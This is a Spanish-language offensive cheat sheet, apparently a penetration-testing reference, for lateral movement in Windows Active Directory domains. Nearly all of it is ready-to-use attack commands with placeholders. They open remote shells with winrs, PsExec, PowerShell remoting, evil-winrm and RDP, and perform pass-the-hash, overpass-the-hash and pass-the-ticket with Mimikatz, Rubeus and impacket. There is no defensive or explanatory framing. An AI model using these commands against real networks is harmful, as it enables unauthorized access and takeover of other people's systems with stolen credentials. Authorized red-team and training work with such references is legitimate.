6. Siguientes pasos
6.1. ¿Tenemos acceso?
winrs
winrs -r:<HOSTNAME> cmd
PsExec
.\\PsExec.exe \\\\<HOSTNAME> cmd
PS-Script
1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sess
Script Block
1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}
WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd
6.2. ¿Tenemos credenciales?
winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
.\\PsExec.exe -u <Domain>/<USER> -p <PASS> \\\\<HOSTNAME> cmd
impacket-psexec <Domain>/<USER>:<PASS>@<IP>
#WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\\<USER> -password <PASS>
evil-winrm -i <IP> -u <Domain>/<USER> -p <PASS>
#RDP Access
rdesktop -a 16 <IP> -u <DOMAIN\\USER> -p <PASS>
xfreerdp /v:IP /u:"<USER>" /p:<PASS>
6.3. Pass The Hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<> /ntlm:<NTLM> /run:powershell.exe"'
impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
evil-winrm -u <username> -H <Hash> -i <IP>
pth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd
#Impacket For Win
.\\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>
#Invoke-TheHash
Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Domain> -Username <> -Hash <NTLM> -Command '<Inj SHELL>' -verbose
6.4. OverPass The Hash (OPTH) O Pass The Key (PTK)
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'
1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
2- export KRB5CCNAME=$(pwd)/<USER>.ccache
3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
6.5. Pass The Ticket (PTT)
Invoke-Mimikatz -Command '"kerberos::ptt <C:\\Path\\To\\Ticket>"'
Rubeus.exe ptt /ticket:<base64 Ticket>
#access
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd